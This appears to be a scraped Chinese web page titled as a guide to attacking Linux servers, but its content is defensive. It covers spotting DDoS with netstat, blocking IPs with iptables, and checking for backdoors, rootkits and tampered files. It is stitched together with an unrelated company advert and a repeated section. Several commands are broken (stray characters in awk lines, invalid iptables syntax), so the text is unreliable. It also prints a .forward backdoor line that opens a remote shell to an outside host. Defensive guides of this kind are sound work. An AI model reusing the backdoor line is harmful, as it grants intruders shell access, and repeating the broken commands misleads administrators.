linux攻擊服務(wù)器命令 如何攻擊linux服務(wù)器

如何在Linux上用命令查詢是否被DDOS攻擊

服務(wù)器出現(xiàn)緩慢的狀況可能由很多事情導(dǎo)致，比如錯(cuò)誤的配置，腳本和差的硬件。但是有時(shí)候它可能因?yàn)橛腥藢?duì)你的服務(wù)器用DoS或者DDoS進(jìn)行洪水攻擊。

公司主營(yíng)業(yè)務(wù)：成都網(wǎng)站設(shè)計(jì)、網(wǎng)站制作、移動(dòng)網(wǎng)站開(kāi)發(fā)等業(yè)務(wù)。幫助企業(yè)客戶真正實(shí)現(xiàn)互聯(lián)網(wǎng)宣傳，提高企業(yè)的競(jìng)爭(zhēng)能力。創(chuàng)新互聯(lián)建站是一支青春激揚(yáng)、勤奮敬業(yè)、活力青春激揚(yáng)、勤奮敬業(yè)、活力澎湃、和諧高效的團(tuán)隊(duì)。公司秉承以“開(kāi)放、自由、嚴(yán)謹(jǐn)、自律”為核心的企業(yè)文化，感謝他們對(duì)我們的高要求，感謝他們從不同領(lǐng)域給我們帶來(lái)的挑戰(zhàn)，讓我們激情的團(tuán)隊(duì)有機(jī)會(huì)用頭腦與智慧不斷的給客戶帶來(lái)驚喜。創(chuàng)新互聯(lián)建站推出巧家免費(fèi)做網(wǎng)站回饋大家。

如何在Linux上使用netstat命令查證DDOS攻擊

DoS攻擊或者DDoS攻擊是試圖讓機(jī)器或者網(wǎng)絡(luò)資源不可用的攻擊。這種攻擊的攻擊目標(biāo)網(wǎng)站或者服務(wù)通常是托管在高防服務(wù)器比如銀行，信用卡支付網(wǎng)管，甚至根域名服務(wù)器，DOS攻擊的實(shí)施通常迫使目標(biāo)重啟計(jì)算機(jī)或者消耗資源，使他們不再提供服務(wù)或者妨礙用戶，訪客訪問(wèn)。

在這篇小文章中，你可以知道在受到攻擊之后如何在終端中使用netstat命令檢查你的服務(wù)器。

一些例子和解釋

netstat -na顯示所有連接到服務(wù)器的活躍的網(wǎng)絡(luò)連接netstat -an | grep :80 | sort只顯示連接到80段口的活躍的網(wǎng)絡(luò)連接,80是http端口,這對(duì)于web服務(wù)器非常有用,并且對(duì)結(jié)果排序.對(duì)于你從許多的連接中找出單個(gè)發(fā)動(dòng)洪水攻擊IP非常有用netstat -n -p|grep SYN_REC | wc -l這個(gè)命令對(duì)于在服務(wù)器上找出活躍的SYNC_REC非常有用,數(shù)量應(yīng)該很低,最好少于5.在dos攻擊和郵件炸彈,這個(gè)數(shù)字可能非常高.然而值通常依賴于系統(tǒng),所以高的值可能平分給另外的服務(wù)器.netstat -n -p | grep SYN_REC | sort -u列出所有包含的IP地址而不僅僅是計(jì)數(shù).netstat -n -p | grep SYN_REC | awk '{print $5}' | awk -F: '{print $1}'列出所有不同的IP地址節(jié)點(diǎn)發(fā)送SYN_REC的連接狀態(tài)netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n使用netstat命令來(lái)計(jì)算每個(gè)IP地址對(duì)服務(wù)器的連接數(shù)量netstat -anp |grep 'tcp|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n列出使用tcp和udp連接到服務(wù)器的數(shù)目netstat -ntu | grep ESTAB | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nr檢查ESTABLISHED連接而不是所有連接,這可以每個(gè)ip的連接數(shù)netstat -plan|grep :80|awk {'print $5'}|cut -d: -f 1|sort|uniq -c|sort -nk 1顯示并且列出連接到80端口IP地址和連接數(shù).80被用來(lái)作為HTTP

如何緩解DDoS攻擊

當(dāng)你發(fā)現(xiàn)攻擊你服務(wù)器的IP你可以使用下面的命令來(lái)關(guān)閉他們的連接：

iptables -A INPUT 1 -s $IPADRESS -j DROP/REJECT

請(qǐng)注意你必須用你使用netstat命令找到的IP數(shù)替換$IPADRESS

在完成以上的命令，使用下面的命令殺掉所有httpd連接，清除你的系統(tǒng)，然后重啟httpd服務(wù)。

killall -KILL httpd service httpd start #For Red Hat systems /etc/init/d/apache2 restar

Linux系統(tǒng)用netstat命令查看DDOS攻擊具體命令用法如下：

代碼如下:netstat -na

顯示所有連接到服務(wù)器的活躍的網(wǎng)絡(luò)連接

代碼如下:netstat -an | grep :80 | sort

只顯示連接到80段口的活躍的網(wǎng)絡(luò)連接,80是http端口,這對(duì)于web服務(wù)器非常有用,并且對(duì)結(jié)果排序.對(duì)于你從許多的連接中找出單個(gè)發(fā)動(dòng)洪水攻擊IP非常有用

代碼如下:netstat -n -p|grep SYN_REC | wc -l

這個(gè)命令對(duì)于在服務(wù)器上找出活躍的SYNC_REC非常有用,數(shù)量應(yīng)該很低,最好少于5.

在dos攻擊和郵件炸彈,這個(gè)數(shù)字可能非常高.然而值通常依賴于系統(tǒng),所以高的值可能平分給另外的服務(wù)器.

代碼如下:netstat -n -p | grep SYN_REC | sort -u

列出所有包含的IP地址而不僅僅是計(jì)數(shù).

代碼如下:netstat -n -p | grep SYN_REC | awk '{print $5}' | awk -F: '{print $1}'

列出所有不同的IP地址節(jié)點(diǎn)發(fā)送SYN_REC的連接狀態(tài)

代碼如下:netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n

使用netstat命令來(lái)計(jì)算每個(gè)IP地址對(duì)服務(wù)器的連接數(shù)量

代碼如下:netstat -anp |grep 'tcp|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n

列出使用tcp和udp連接到服務(wù)器的數(shù)目

代碼如下:netstat -ntu | grep ESTAB | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nr

檢查ESTABLISHED連接而不是所有連接,這可以每個(gè)ip的連接數(shù)

代碼如下:netstat -plan|grep :80|awk {'print $5'}|cut -d: -f 1|sort|uniq -c|sort -nk 1

顯示并且列出連接到80端口IP地址和連接數(shù).80被用來(lái)作為HTTP

如何緩解ddos攻擊

當(dāng)你發(fā)現(xiàn)攻擊你服務(wù)器的IP你可以使用下面的命令來(lái)關(guān)閉他們的連接：

代碼如下:iptables -A INPUT 1 -s $IPADRESS -j DROP/REJECT

請(qǐng)注意你必須用你使用netstat命令找到的IP數(shù)替換$IPADRESS

雷網(wǎng)主機(jī)Linux服務(wù)器被入侵時(shí)的處理辦法有哪些？

隨著Linux企業(yè)應(yīng)用的擴(kuò)展，有大量的網(wǎng)絡(luò)服務(wù)器使用Linux操作系統(tǒng)。Linux服務(wù)器的安全性能受到越來(lái)越多的關(guān)注，這里根據(jù)Linux服務(wù)器受到攻擊的深度以級(jí)別形式列出，并提出不同的解決方案。 對(duì)Linux服務(wù)器攻擊的定義是：攻擊是一種旨在妨礙、損害、削弱、破壞Linux服務(wù)器安全的未授權(quán)行為。攻擊的范圍可以從服務(wù)拒絕直至完全危害和破壞Linux服務(wù)器。對(duì)Linux服務(wù)器攻擊有許多種類(lèi),本文從攻擊深度的角度說(shuō)明，我們把攻擊分為四級(jí)。

攻擊級(jí)別一：服務(wù)拒絕攻擊（DoS）

由于DoS攻擊工具的泛濫，及所針對(duì)的協(xié)議層的缺陷短時(shí)無(wú)法改變的事實(shí)，DoS也就成為了流傳最廣、最難防范的攻擊方式。

服務(wù)拒絕攻擊包括分布式拒絕服務(wù)攻擊、反射式分布拒絕服務(wù)攻擊、DNS分布拒絕服務(wù)攻擊、FTP攻擊等。大多數(shù)服務(wù)拒絕攻擊導(dǎo)致相對(duì)低級(jí)的危險(xiǎn)，即便是那些可能導(dǎo)致系統(tǒng)重啟的攻擊也僅僅是暫時(shí)性的問(wèn)題。這類(lèi)攻擊在很大程度上不同于那些想獲取網(wǎng)絡(luò)控制的攻擊，一般不會(huì)對(duì)數(shù)據(jù)安全有影響，但是服務(wù)拒絕攻擊會(huì)持續(xù)很長(zhǎng)一段時(shí)間，非常難纏。

到目前為止，沒(méi)有一個(gè)絕對(duì)的方法可以制止這類(lèi)攻擊。但這并不表明我們就應(yīng)束手就擒，除了強(qiáng)調(diào)個(gè)人主機(jī)加強(qiáng)保護(hù)不被利用的重要性外，加強(qiáng)對(duì)服務(wù)器的管理是非常重要的一環(huán)。一定要安裝驗(yàn)證軟件和過(guò)濾功能，檢驗(yàn)該報(bào)文的源地址的真實(shí)地址。另外對(duì)于幾種服務(wù)拒絕可以采用以下措施：關(guān)閉不必要的服務(wù)、限制同時(shí)打開(kāi)的Syn半連接數(shù)目、縮短Syn半連接的time out 時(shí)間、及時(shí)更新系統(tǒng)補(bǔ)丁。

攻擊級(jí)別二：本地用戶獲取了他們非授權(quán)的文件的讀寫(xiě)權(quán)限

本地用戶是指在本地網(wǎng)絡(luò)的任一臺(tái)機(jī)器上有口令、因而在某一驅(qū)動(dòng)器上有一個(gè)目錄的用戶。本地用戶獲取到了他們非授權(quán)的文件的讀寫(xiě)權(quán)限的問(wèn)題是否構(gòu)成危險(xiǎn)很大程度上要看被訪問(wèn)文件的關(guān)鍵性。任何本地用戶隨意訪問(wèn)臨時(shí)文件目錄（/tmp）都具有危險(xiǎn)性，它能夠潛在地鋪設(shè)一條通向下一級(jí)別攻擊的路徑。

級(jí)別二的主要攻擊方法是：黑客誘騙合法用戶告知其機(jī)密信息或執(zhí)行任務(wù)，有時(shí)黑客會(huì)假裝網(wǎng)絡(luò)管理人員向用戶發(fā)送郵件，要求用戶給他系統(tǒng)升級(jí)的密碼。

由本地用戶啟動(dòng)的攻擊幾乎都是從遠(yuǎn)程登錄開(kāi)始。對(duì)于Linux服務(wù)器，最好的辦法是將所有shell賬號(hào)放置于一個(gè)單獨(dú)的機(jī)器上，也就是說(shuō)，只在一臺(tái)或多臺(tái)分配有shell訪問(wèn)的服務(wù)器上接受注冊(cè)。這可以使日志管理、訪問(wèn)控制管理、釋放協(xié)議和其他潛在的安全問(wèn)題管理更容易些。還應(yīng)該將存放用戶CGI的系統(tǒng)區(qū)分出來(lái)。這些機(jī)器應(yīng)該隔離在特定的網(wǎng)絡(luò)區(qū)段，也就是說(shuō)，根據(jù)網(wǎng)絡(luò)的配置情況，它們應(yīng)該被路由器或網(wǎng)絡(luò)交換機(jī)包圍。其拓?fù)浣Y(jié)構(gòu)應(yīng)該確保硬件地址欺騙也不能超出這個(gè)區(qū)段。

攻擊級(jí)別三：遠(yuǎn)程用戶獲得特權(quán)文件的讀寫(xiě)權(quán)限

第三級(jí)別的攻擊能做到的不只是核實(shí)特定文件是否存在，而且還能讀寫(xiě)這些文件。造成這種情況的原因是：Linux服務(wù)器配置中出現(xiàn)這樣一些弱點(diǎn)：即遠(yuǎn)程用戶無(wú)需有效賬號(hào)就可以在服務(wù)器上執(zhí)行有限數(shù)量的命令。

密碼攻擊法是第三級(jí)別中的主要攻擊法，損壞密碼是最常見(jiàn)的攻擊方法。密碼破解是用以描述在使用或不使用工具的情況下滲透網(wǎng)絡(luò)、系統(tǒng)或資源以解鎖用密碼保護(hù)的資源的一個(gè)術(shù)語(yǔ)。用戶常常忽略他們的密碼，密碼政策很難得到實(shí)施。黑客有多種工具可以擊敗技術(shù)和社會(huì)所保護(hù)的密碼。主要包括：字典攻擊（Dictionary attack）、混合攻擊（Hybrid attack）、蠻力攻擊（Brute force attack）。一旦黑客擁有了用戶的密碼，他就有很多用戶的特權(quán)。密碼猜想是指手工進(jìn)入普通密碼或通過(guò)編好程序的正本取得密碼。一些用戶選擇簡(jiǎn)單的密碼-如生日、紀(jì)念日和配偶名字，卻并不遵循應(yīng)使用字母、數(shù)字混合使用的規(guī)則。對(duì)黑客來(lái)說(shuō)要猜出一串8個(gè)字生日數(shù)據(jù)不用花多長(zhǎng)時(shí)間。

防范第三級(jí)別的攻擊的最好的防衛(wèi)方法便是嚴(yán)格控制進(jìn)入特權(quán)，即使用有效的密碼。 主要包括密碼應(yīng)當(dāng)遵循字母、數(shù)字、大小寫(xiě)（因?yàn)長(zhǎng)inux對(duì)大小寫(xiě)是有區(qū)分）混合使用的規(guī)則。 使用象"#"或"%"或"$"這樣的特殊字符也會(huì)添加復(fù)雜性。例如采用"countbak"一詞，在它后面添加"#$"（countbak#$），這樣您就擁有了一個(gè)相當(dāng)有效的密碼。

攻擊級(jí)別四：遠(yuǎn)程用戶獲得根權(quán)限

第四攻擊級(jí)別是指那些決不應(yīng)該發(fā)生的事發(fā)生了，這是致命的攻擊。表示攻擊者擁有Linux服務(wù)器的根、超級(jí)用戶或管理員許可權(quán)，可以讀、寫(xiě)并執(zhí)行所有文件。換句話說(shuō)，攻擊者具有對(duì)Linux服務(wù)器的全部控制權(quán)，可以在任何時(shí)刻都能夠完全關(guān)閉甚至毀滅此網(wǎng)絡(luò)。

攻擊級(jí)別四主要攻擊形式是TCP/IP連續(xù)偷竊，被動(dòng)通道聽(tīng)取和信息包攔截。TCP/IP連續(xù)偷竊，被動(dòng)通道聽(tīng)取和信息包攔截，是為進(jìn)入網(wǎng)絡(luò)收集重要信息的方法，不像拒絕服務(wù)攻擊，這些方法有更多類(lèi)似偷竊的性質(zhì)，比較隱蔽不易被發(fā)現(xiàn)。一次成功的TCP/IP攻擊能讓黑客阻攔兩個(gè)團(tuán)體之間的交易，提供中間人襲擊的良好機(jī)會(huì)，然后黑客會(huì)在不被受害者注意的情況下控制一方或雙方的交易。通過(guò)被動(dòng)竊聽(tīng)，黑客會(huì)操縱和登記信息，把文件送達(dá)，也會(huì)從目標(biāo)系統(tǒng)上所有可通過(guò)的通道找到可通過(guò)的致命要害。黑客會(huì)尋找聯(lián)機(jī)和密碼的結(jié)合點(diǎn)，認(rèn)出申請(qǐng)合法的通道。信息包攔截是指在目標(biāo)系統(tǒng)約束一個(gè)活躍的聽(tīng)者程序以攔截和更改所有的或特別的信息的地址。信息可被改送到非法系統(tǒng)閱讀，然后不加改變地送回給黑客。

TCP/IP連續(xù)偷竊實(shí)際就是網(wǎng)絡(luò)嗅探，注意如果您確信有人接了嗅探器到自己的網(wǎng)絡(luò)上，可以去找一些進(jìn)行驗(yàn)證的工具。這種工具稱(chēng)為時(shí)域反射計(jì)量器(Time Domain Reflectometer，TDR)。TDR對(duì)電磁波的傳播和變化進(jìn)行測(cè)量。將一個(gè)TDR連接到網(wǎng)絡(luò)上，能夠檢測(cè)到未授權(quán)的獲取網(wǎng)絡(luò)數(shù)據(jù)的設(shè)備。不過(guò)很多中小公司沒(méi)有這種價(jià)格昂貴的工具。對(duì)于防范嗅探器的攻擊最好的方法是：

1、安全的拓?fù)浣Y(jié)構(gòu)。嗅探器只能在當(dāng)前網(wǎng)絡(luò)段上進(jìn)行數(shù)據(jù)捕獲。這就意味著，將網(wǎng)絡(luò)分段工作進(jìn)行得越細(xì)，嗅探器能夠收集的信息就越少。

2、會(huì)話加密。不用特別地?fù)?dān)心數(shù)據(jù)被嗅探，而是要想辦法使得嗅探器不認(rèn)識(shí)嗅探到的數(shù)據(jù)。這種方法的優(yōu)點(diǎn)是明顯的：即使攻擊者嗅探到了數(shù)據(jù)，這些數(shù)據(jù)對(duì)他也是沒(méi)有用的。

特別提示：應(yīng)對(duì)攻擊的反擊措施

對(duì)于超過(guò)第二級(jí)別的攻擊您就要特別注意了。因?yàn)樗鼈兛梢圆粩嗟奶嵘艏?jí)別，以滲透Linux服務(wù)器。此時(shí)，我們可以采取的反擊措施有： 首先備份重要的企業(yè)關(guān)鍵數(shù)據(jù)。 改變系統(tǒng)中所有口令，通知用戶找系統(tǒng)管理員得到新口令。 隔離該網(wǎng)絡(luò)網(wǎng)段使攻擊行為僅出現(xiàn)在一個(gè)小范圍內(nèi)。 允許行為繼續(xù)進(jìn)行。如有可能，不要急于把攻擊者趕出系統(tǒng)，為下一步作準(zhǔn)備。

記錄所有行為，收集證據(jù)。這些證據(jù)包括：系統(tǒng)登錄文件、應(yīng)用登錄文件、AAA（Authentication、Authorization、 Accounting，認(rèn)證、授權(quán)、計(jì)費(fèi)）登錄文件，RADIUS（Remote Authentication

Dial-In User Service） 登錄，網(wǎng)絡(luò)單元登錄（Network Element Logs）、防火墻登錄、HIDS（Host-base IDS，基于主機(jī)的入侵檢測(cè)系統(tǒng)） 事件、NIDS（網(wǎng)絡(luò)入侵檢測(cè)系統(tǒng)）事件、磁盤(pán)驅(qū)動(dòng)器、隱含文件等。收集證據(jù)時(shí)要注意：在移動(dòng)或拆卸任何設(shè)備之前都要拍照；在調(diào)查中要遵循兩人法則，在信息收集中要至少有兩個(gè)人，以防止篡改信息；應(yīng)記錄所采取的所有步驟以及對(duì)配置設(shè)置的任何改變，要把這些記錄保存在安全的地方。檢查系統(tǒng)所有目錄的存取許可，檢測(cè)Permslist是否被修改過(guò)。

進(jìn)行各種嘗試(使用網(wǎng)絡(luò)的不同部分)以識(shí)別出攻擊源。

為了使用法律武器打擊犯罪行為，必須保留證據(jù)，而形成證據(jù)需要時(shí)間。為了做到這一點(diǎn)，必須忍受攻擊的沖擊(雖然可以制定一些安全措施來(lái)確保攻擊不損害網(wǎng)絡(luò))。對(duì)此情形，我們不但要采取一些法律手段，而且還要至少請(qǐng)一家有權(quán)威的安全公司協(xié)助阻止這種犯罪。這類(lèi)操作的最重要特點(diǎn)就是取得犯罪的證據(jù)、并查找犯罪者的地址，提供所擁有的日志。對(duì)于所搜集到的證據(jù)，應(yīng)進(jìn)行有效地保存。在開(kāi)始時(shí)制作兩份，一個(gè)用于評(píng)估證據(jù)，另一個(gè)用于法律驗(yàn)證。

找到系統(tǒng)漏洞后設(shè)法堵住漏洞，并進(jìn)行自我攻擊測(cè)試。

網(wǎng)絡(luò)安全已經(jīng)不僅僅是技術(shù)問(wèn)題，而是一個(gè)社會(huì)問(wèn)題。企業(yè)應(yīng)當(dāng)提高對(duì)網(wǎng)絡(luò)安全重視，如果一味地只依靠技術(shù)工具，那就會(huì)越來(lái)越被動(dòng)；只有發(fā)揮社會(huì)和法律方面打擊網(wǎng)絡(luò)犯罪，才能更加有效。我國(guó)對(duì)于打擊網(wǎng)絡(luò)犯罪已經(jīng)有了明確的司法解釋?zhuān)z憾的是大多數(shù)企業(yè)只重視技術(shù)環(huán)節(jié)的作用而忽略法律、社會(huì)因素，這也是本文的寫(xiě)作目的。

拒絕服務(wù)攻擊（DoS）

DoS即Denial Of Service，拒絕服務(wù)的縮寫(xiě)，可不能認(rèn)為是微軟的DOS操作系統(tǒng)！DoS攻擊即讓目標(biāo)機(jī)器停止提供服務(wù)或資源訪問(wèn)，通常是以消耗服務(wù)器端資源為目標(biāo)，通過(guò)偽造超過(guò)服務(wù)器處理能力的請(qǐng)求數(shù)據(jù)造成服務(wù)器響應(yīng)阻塞，使正常的用戶請(qǐng)求得不到應(yīng)答，以實(shí)現(xiàn)攻擊目的。

Linux服務(wù)器是否被攻擊怎么判斷

1、檢查系統(tǒng)密碼文件

首先從明顯的入手，查看一下passwd文件，ls –l /etc/passwd查看文件修改的日期。

檢查一下passwd文件中有哪些特權(quán)用戶，系統(tǒng)中uid為0的用戶都會(huì)被顯示出來(lái)。

1

awk –F:’$3==0?{print?$1}’?/etc/passwd

順便再檢查一下系統(tǒng)里有沒(méi)有空口令帳戶：

1

awk –F: ‘length($2)==0?{print?$1}’?/etc/shadow

2、查看一下進(jìn)程，看看有沒(méi)有奇怪的進(jìn)程

重點(diǎn)查看進(jìn)程：ps –aef | grep inetd

inetd是UNIX系統(tǒng)的守護(hù)進(jìn)程，正常的inetd的pid都比較靠前，如果你看到輸出了一個(gè)類(lèi)似inetd –s /tmp/.xxx之類(lèi)的進(jìn)程，著重看inetd –s后面的內(nèi)容。在正常情況下，LINUX系統(tǒng)中的inetd服務(wù)后面是沒(méi)有-s參數(shù)的，當(dāng)然也沒(méi)有用inetd去啟動(dòng)某個(gè)文件；而solaris系統(tǒng)中也僅僅是inetd –s，同樣沒(méi)有用inetd去啟動(dòng)某個(gè)特定的文件；如果你使用ps命令看到inetd啟動(dòng)了某個(gè)文件，而你自己又沒(méi)有用inetd啟動(dòng)這個(gè)文件，那就說(shuō)明已經(jīng)有人入侵了你的系統(tǒng)，并且以root權(quán)限起了一個(gè)簡(jiǎn)單的后門(mén)。

輸入ps –aef 查看輸出信息，尤其注意有沒(méi)有以./xxx開(kāi)頭的進(jìn)程。一旦發(fā)現(xiàn)異樣的進(jìn)程，經(jīng)檢查為入侵者留下的后門(mén)程序，立即運(yùn)行kill –9 pid 開(kāi)殺死該進(jìn)程，然后再運(yùn)行ps –aef查看該進(jìn)程是否被殺死；一旦此類(lèi)進(jìn)程出現(xiàn)殺死以后又重新啟動(dòng)的現(xiàn)象，則證明系統(tǒng)被人放置了自動(dòng)啟動(dòng)程序的腳本。這個(gè)時(shí)候要進(jìn)行仔細(xì)查找：find / -name 程序名 –print，假設(shè)系統(tǒng)真的被入侵者放置了后門(mén)，根據(jù)找到的程序所在的目錄，會(huì)找到很多有趣的東東J

UNIX下隱藏進(jìn)程有的時(shí)候通過(guò)替換ps文件來(lái)做，檢測(cè)這種方法涉及到檢查文件完整性，稍后我們?cè)儆懻撨@種方法。

接下來(lái)根據(jù)找到入侵者在服務(wù)器上的文件目錄，一步一步進(jìn)行追蹤。

3、檢查系統(tǒng)守護(hù)進(jìn)程

檢查/etc/inetd.conf文件，輸入：cat /etc/inetd.conf | grep –v “^#”，輸出的信息就是你這臺(tái)機(jī)器所開(kāi)啟的遠(yuǎn)程服務(wù)。

一般入侵者可以通過(guò)直接替換in.xxx程序來(lái)創(chuàng)建一個(gè)后門(mén)，比如用/bin/sh 替換掉in.telnetd，然后重新啟動(dòng)inetd服務(wù)，那么telnet到服務(wù)器上的所有用戶將不用輸入用戶名和密碼而直接獲得一個(gè)rootshell。

4、檢查網(wǎng)絡(luò)連接和監(jiān)聽(tīng)端口

輸入netstat -an，列出本機(jī)所有的連接和監(jiān)聽(tīng)的端口，查看有沒(méi)有非法連接。

輸入netstat –rn，查看本機(jī)的路由、網(wǎng)關(guān)設(shè)置是否正確。

輸入 ifconfig –a，查看網(wǎng)卡設(shè)置。

5、檢查系統(tǒng)日志

命令last | more查看在正常情況下登錄到本機(jī)的所有用戶的歷史記錄。但last命令依賴于syslog進(jìn)程，這已經(jīng)成為入侵者攻擊的重要目標(biāo)。入侵者通常會(huì)停止系統(tǒng)的syslog，查看系統(tǒng)syslog進(jìn)程的情況，判斷syslog上次啟動(dòng)的時(shí)間是否正常，因?yàn)閟yslog是以root身份執(zhí)行的，如果發(fā)現(xiàn)syslog被非法動(dòng)過(guò)，那說(shuō)明有重大的入侵事件。

在linux下輸入ls –al /var/log

在solaris下輸入 ls –al /var/adm

檢查wtmp utmp，包括messgae等文件的完整性和修改時(shí)間是否正常，這也是手工擦除入侵痕跡的一種方法。

6、檢查系統(tǒng)中的core文件

通過(guò)發(fā)送畸形請(qǐng)求來(lái)攻擊服務(wù)器的某一服務(wù)來(lái)入侵系統(tǒng)是一種常規(guī)的入侵方法，典型的RPC攻擊就是通過(guò)這種方式。這種方式有一定的成功率，也就是說(shuō)它并不能100%保證成功入侵系統(tǒng)，而且通常會(huì)在服務(wù)器相應(yīng)目錄下產(chǎn)生core文件，全局查找系統(tǒng)中的core文件，輸入find / -name core –exec ls –l {} \; 依據(jù)core所在的目錄、查詢core文件來(lái)判斷是否有入侵行為。

7、.rhosts和.forward

這是兩種比較著名的后門(mén)文件，如果想檢查你的系統(tǒng)是否被入侵者安裝了后門(mén)，不妨全局查找這兩個(gè)文件：

find / -name “.rhosts” –print

find / -name “.forward” –print

在某用戶的$HOME下，.rhosts文件中僅包含兩個(gè)+號(hào)是非常危險(xiǎn)的，如果你的系統(tǒng)上開(kāi)了513端口（rlogin端口，和telnet作用相同），那么任意是誰(shuí)都可以用這個(gè)用戶登錄到你的系統(tǒng)上而不需要任何驗(yàn)證。

看到這里如果想要深入的做安全加固服務(wù)以及安全部署

就必須找專(zhuān)業(yè)做服務(wù)器的安全公司來(lái)處理了國(guó)內(nèi)也就Sine安全和綠盟比較專(zhuān)業(yè)提供。

Unix下在.forward文件里放入命令是重新獲得訪問(wèn)的常用方法在某一 用戶$HOME下的.forward可能設(shè)置如下:

\username|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 –e /bin/sh"

這種方法的變形包括改變系統(tǒng)的mail的別名文件(通常位于/etc/aliases). 注意這只是一種簡(jiǎn)單的變換. 更為高級(jí)的能夠從.forward中運(yùn)行簡(jiǎn)單腳本實(shí)現(xiàn)在標(biāo)準(zhǔn)輸入執(zhí)行任意命令(小部分預(yù)處理后).利用smrsh可以有效的制止這種后門(mén)(雖然如果允許可以自運(yùn)行的elm's filter或procmail類(lèi)程序, 很有可能還有問(wèn)題。在Solaris系統(tǒng)下，如果你運(yùn)行如下命令：

ln -s /var/mail/luser ~/.forward

然后設(shè)置vacation有效，那么/var/mail/luser就會(huì)被拷貝到~/.forward，同時(shí)會(huì)附加"|/usr/bin/vacation me"，舊的symlink被移到~/.forward..BACKUP中。

直接刪除掉這兩個(gè)文件也可以。

8、檢查系統(tǒng)文件完整性

檢查文件的完整性有多種方法，通常我們通過(guò)輸入ls –l 文件名來(lái)查詢和比較文件，這種方法雖然簡(jiǎn)單，但還是有一定的實(shí)用性。但是如果ls文件都已經(jīng)被替換了就比較麻煩。在LINUX下可以用rpm –V `rpm –qf 文件名` 來(lái)查詢，國(guó)家查詢的結(jié)果是否正常來(lái)判斷文件是否完整。在LINUX下使用rpm來(lái)檢查文件的完整性的方法也很多，這里不一一贅述，可以man rpm來(lái)獲得更多的格式。

UNIX系統(tǒng)中，/bin/login是被入侵者經(jīng)常替換作為后門(mén)的文件，接下來(lái)談一下login后門(mén) ：

UNIX里，Login程序通常用來(lái)對(duì)telnet來(lái)的用戶進(jìn)行口令驗(yàn)證。入侵者獲取login的源代碼并修改，使它在比較輸入口令與存儲(chǔ)口令時(shí)先檢查后門(mén)口令。如果用戶敲入后門(mén)口令，它將忽視管理員設(shè)置的口令讓你長(zhǎng)驅(qū)直入：這將允許入侵者進(jìn)入任何賬號(hào)，甚至是root目錄。由于后門(mén)口令是在用戶真實(shí)登錄并被日志記錄到utmp和wtmP前產(chǎn)生的一個(gè)訪問(wèn)，所以入侵者可以登錄獲取shell卻不會(huì)暴露該賬號(hào)。管理員注意到這種后門(mén)后，使用”strings”命令搜索login程序以尋找文本信息。許多情況下后門(mén)口令會(huì)原形畢露。入侵者又會(huì)開(kāi)始加密或者更改隱藏口令，使strings命令失效。所以許多管理員利用MD5校驗(yàn)和檢測(cè)這種后門(mén)。UNIX系統(tǒng)中有md5sum命令，輸入md5sum 文件名檢查該文件的md5簽名。它的使用格式如下：md5sum –b 使用二進(jìn)制方式閱讀文件；md5sum –c 逆向檢查MD5簽名；md5sum –t 使用文本方式閱讀文件。

在前面提到過(guò)守護(hù)進(jìn)程，對(duì)于守護(hù)進(jìn)程配置文件inetd.conf中沒(méi)有被注釋掉的行要進(jìn)行仔細(xì)比較，舉個(gè)簡(jiǎn)單的例子，如果你開(kāi)放了telnet服務(wù)，守護(hù)進(jìn)程配置文件中就會(huì)有一句：telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd

可以看到它所使用的文件是 /usr/sbin/in.telnetd，檢查該文件的完整性，入侵者往往通過(guò)替換守護(hù)進(jìn)程中允許的服務(wù)文件來(lái)為自己創(chuàng)建一個(gè)后門(mén)。

LINUX系統(tǒng)中的/etc/crontab也是經(jīng)常被入侵者利用的一個(gè)文件，檢查該文件的完整性，可以直接cat /etc/crontab，仔細(xì)閱讀該文件有沒(méi)有被入侵者利用來(lái)做其他的事情。

不替換login等文件而直接使用進(jìn)程來(lái)啟動(dòng)后門(mén)的方法有一個(gè)缺陷，即系統(tǒng)一旦重新啟動(dòng)，這個(gè)進(jìn)程就被殺死了，所以得讓這個(gè)后門(mén)在系統(tǒng)啟動(dòng)的時(shí)候也啟動(dòng)起來(lái)。通常通過(guò)檢查/etc/rc.d下的文件來(lái)查看系統(tǒng)啟動(dòng)的時(shí)候是不是帶有后門(mén)程序；這個(gè)方法怎么有點(diǎn)象查windows下的trojan？

說(shuō)到這里，另外提一下，如果在某一目錄下發(fā)現(xiàn)有屬性為這樣的文件：-rwsr-xr-x 1 root root xxx .sh，這個(gè)表明任何用戶進(jìn)來(lái)以后運(yùn)行這個(gè)文件都可以獲得一個(gè)rootshell，這就是setuid文件。運(yùn)行 find –perm 4000 –print對(duì)此類(lèi)文件進(jìn)行全局查找，然后刪除這樣的文件。

9、檢查內(nèi)核級(jí)后門(mén)

如果你的系統(tǒng)被人安裝了這種后門(mén)，通常都是比較討厭的，我常常就在想，遇到這種情況還是重新安裝系統(tǒng)算了J，言歸正傳，首先，檢查系統(tǒng)加載的模塊，在LINUX系統(tǒng)下使用lsmod命令，在solaris系統(tǒng)下使用modinfo命令來(lái)查看。這里需要說(shuō)明的是，一般默認(rèn)安裝的LINUX加載的模塊都比較少，通常就是網(wǎng)卡的驅(qū)動(dòng)；而solaris下就很多，沒(méi)別的辦法，只有一條一條地去分析。對(duì)內(nèi)核進(jìn)行加固后，應(yīng)禁止插入或刪除模塊，從而保護(hù)系統(tǒng)的安全，否則入侵者將有可能再次對(duì)系統(tǒng)調(diào)用進(jìn)行替換。我們可以通過(guò)替換create_module()和delete_module()來(lái)達(dá)到上述目的。另外，對(duì)這個(gè)內(nèi)核進(jìn)行加固模塊時(shí)應(yīng)盡早進(jìn)行，以防系統(tǒng)調(diào)用已經(jīng)被入侵者替換。如果系統(tǒng)被加載了后門(mén)模塊，但是在模塊列表/proc/module里又看不到它們，有可能是使用了hack工具來(lái)移除加載的模塊，大名鼎鼎的knark工具包就有移除加載模塊的工具。出現(xiàn)這種情況，需要仔細(xì)查找/proc目錄，根據(jù)查找到的文件和經(jīng)驗(yàn)來(lái)判斷被隱藏和偽裝的進(jìn)程。Knark后門(mén)模塊就在/proc/knark目錄，當(dāng)然可能這個(gè)目錄是隱藏的。

